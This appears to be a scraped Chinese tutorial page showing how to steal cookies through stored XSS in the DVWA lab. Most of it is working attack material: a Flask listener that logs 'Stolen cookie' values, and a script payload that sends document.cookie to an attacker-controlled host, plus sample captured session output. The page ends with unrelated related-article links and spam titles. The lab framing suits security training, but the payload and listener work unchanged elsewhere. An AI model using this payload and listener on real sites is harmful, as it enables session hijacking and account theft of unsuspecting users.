当前位置: 首页 > news >正文

使用存储型 XSS 窃取 cookie 并发送到你控制的服务器

🧪 第一步:准备监听服务接收 cookie

在你的本机(非容器)或 DVWA 所在主机运行以下 Python 监听代码,用于接收窃取的 cookie:

启动 HTTP 接收服务

# 在本机终端运行,监听 8081 端口(确保防火墙允许)
python3 -m http.server 8081

在这里插入图片描述
注意:CentOS 7 默认开启了 firewalld,你需要允许 8081 端口访问:

firewall-cmd --add-port=8081/tcp --permanent
firewall-cmd --reload

确认能访问你的监听服务器:

curl http://《监听机IP》:8081

在这里插入图片描述

或者你也可以用 Flask 搭建更真实的监听:

# listener.py
from flask import Flask, requestapp = Flask(__name__)@app.route('/log')
def log():cookie = request.args.get('c')print(f"Stolen cookie: {cookie}")return '', 204if __name__ == '__main__':app.run(host='0.0.0.0', port=8081)

运行:

python3 listener.py

🧪 第二步:注入 Payload 到 DVWA 的 Stored XSS 页面

1.拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
2.打开浏览器访问你的 DVWA:http://localhost:8080/vulnerabilities/xss_s/
3.将以下 payload 作为留言输入:

🍪 Cookie 窃取 Payload:

<script>new Image().src="http://<你的主机IP>:8081/log?c="+document.cookie;
</script>

替换 <你的主机IP> 为你运行监听服务的真实 IP 地址。容器里访问主机可以用:

Linux 宿主:172.17.0.1

Windows/macOS Docker:host.docker.internal(需要开启端口映射)

在这里插入图片描述

✅ 第三步:触发注入点

1.提交留言后,访问该页面会触发脚本

2.你监听服务的终端中应会看到类似输出:

Stolen cookie: security=low; PHPSESSID=abcd1234xyz

在这里插入图片描述

如果能看到 cookie 值被打印,就说明 成功窃取 cookie 并 exfiltrate 出去了。

相关文章:

  • 【JS-2】JavaScript基础语法完全指南:从入门到精通
  • 【小沐杂货铺】基于Babylon.JS绘制三维数字地球Earth(GIS 、WebGL、vue、react,提供全部源代码)
  • Java学习笔记——lambda表达式
  • LangGraph--设计一个给出标准提示词模板的聊天机器人
  • 【MySQL】TencentOS 安装登录MySQL
  • 如何通过 noindex 阻止网页被搜索引擎编入索引?
  • 土建施工安全管理难?免费AI系统 24h 监控预警
  • 疗愈经济崛起:如何把“情绪价值”转化为医疗健康产品?
  • 【JavaEE】(2) 多线程1
  • nlp和大模型
  • 大语言模型:提示词决定自我反思效果: “检查回答是否错误” “验证回答是否正确”
  • EXCEL破解VBA密码 ( 仅供学习研究使用)
  • 多模态大语言模型arxiv论文略读(122)
  • 期权入门介绍
  • 基于CNN深度学习的小程序识别-视频介绍下自取
  • Java—— ArrayList 和 LinkedList 详解
  • Linux服务器入门教程
  • c++中list的使用
  • 【图像处理入门】8. 数学基础与优化:线性代数、概率与算法调优实战
  • 设计模式-装饰器模式
  • html5 网站建设/今日热点新闻事件摘抄
  • wordpress 敏感词过滤/快速优化seo软件
  • 做注册任务的网站有哪些/域名
  • 荥阳网站建设/关键词优化哪家强
  • 小地方网站建设公司/专业代写文案的公司
  • 做外贸的都有那些网站/武汉网站排名推广